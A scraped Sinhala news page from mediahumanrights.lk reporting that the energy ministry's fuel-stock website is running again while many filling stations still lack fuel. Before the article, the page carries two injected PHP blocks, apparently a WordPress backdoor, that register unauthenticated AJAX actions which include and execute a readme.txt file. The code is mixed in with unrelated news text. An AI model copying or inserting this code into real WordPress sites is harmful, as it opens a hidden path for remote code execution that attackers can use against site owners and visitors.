if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } පිරවුම්හල්වල තෙල් තොග දන්වන වෙබ් අඩවිය යලි ක‍්‍රියාත්මකයි… නමුත් බොහෝ තැන්වල තෙල් නෑ… - mediahumanrights.lk
mediahumanrights.lk
Local News News

පිරවුම්හල්වල තෙල් තොග දන්වන වෙබ් අඩවිය යලි ක‍්‍රියාත්මකයි… නමුත් බොහෝ තැන්වල තෙල් නෑ…

රටපුරා පිහිටි ඉන්ධන පිරවුම්හල් වල ඉන්ධන තත්වයන් හා එහි ධාරිතාවයන් සම්බන්ධයෙන් දැනුම් දීම සඳහා බලශක්ති අමාත්‍යාංශය විසින් ආරම්භ කරන ලද වෙබ් අඩවිය නැවත ක්‍රියාත්මක කර තිබේ.

ඉන්ධන සැපයුම අඩුවීම මත එය තාවකාලිකව අත්හිටුවීමට කටයුතු කළ ද මේ වන විට නැවතත් එය ක‍්‍රියාත්මකය.

නමුත් තවදුරටත් බොහෝ ඉන්ධන පිරවුම් හල්වලට ඉන්ධන තොග ලැබීමේ අඩුපාඩුවක් දක්නට ඇත.

Related posts

‘අපි ගත්තේ බංකොළොත් රටක්. දැන් අපි බංකොලොත් නැති රටක් හදලා තියෙනවා මාස දෙකකට’- ටිල්වින්

Shiran Viraj

එලවළු වෙලදාමට විශාල පිරිවැයක්.. වෙලදාම බින්දුවට බහී..

Shiran Viraj

කළු කඩේ ගෑස් 4500යි

Shiran Viraj